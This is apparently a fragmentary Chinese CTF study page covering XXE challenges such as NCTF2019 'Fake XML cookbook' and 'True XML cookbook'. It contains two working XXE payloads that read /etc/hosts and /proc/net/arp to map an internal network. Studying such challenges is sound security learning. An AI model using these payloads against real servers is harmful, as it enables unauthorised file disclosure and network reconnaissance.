知识
实例
BUU
[PHP]XXE
进来看到
然后一起看
Write
BUU XXE COURSE 1
进来看到
一起看
write
NSS
[NCTF2019]Fake XML cookbook
反正是XXE
直接整
write
[NCTF 2019]True XML cookbook
不整花里胡哨,解题在最下面
write
与博主不同,我通过下面的语句得到了三个地址,其中两个通过c段扫描可以直接出来flag。flag出来了,输入平台却不对
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY abc SYSTEM "file:///etc/hosts">
]>
<user><username>&abc;</username><password>123456</password></user>
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY abc SYSTEM "file:///proc/net/arp">
]>
<user><username>&abc;</username><password>123456</password></user>
![java八股文面试[数据结构]——HashMap和HashTable区别](https://img-blog.csdnimg.cn/70db7c62a72d4052850f0adf745622f5.png)
